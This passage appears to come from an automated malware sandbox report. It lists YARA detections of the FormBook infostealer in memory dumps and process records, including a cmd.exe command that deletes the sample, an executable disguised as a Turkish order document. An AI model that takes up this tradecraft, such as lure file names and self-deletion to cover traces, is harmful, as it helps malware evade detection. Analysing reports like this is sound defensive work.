Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.4539184982.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4539184982.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4539184982.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.4539184982.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.4539184982.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.4538973840.0000000002E30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4538973840.0000000002E30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4538973840.0000000002E30000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.4538973840.0000000002E30000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.4538973840.0000000002E30000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.4539570666.0000000003250000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4539570666.0000000003250000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4539570666.0000000003250000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.4539570666.0000000003250000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.4539570666.0000000003250000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high
Has exited:	false

Target ID:	9
Start time:	09:58:16
Start date:	31/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	10
Start time:	09:58:16
Start date:	31/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true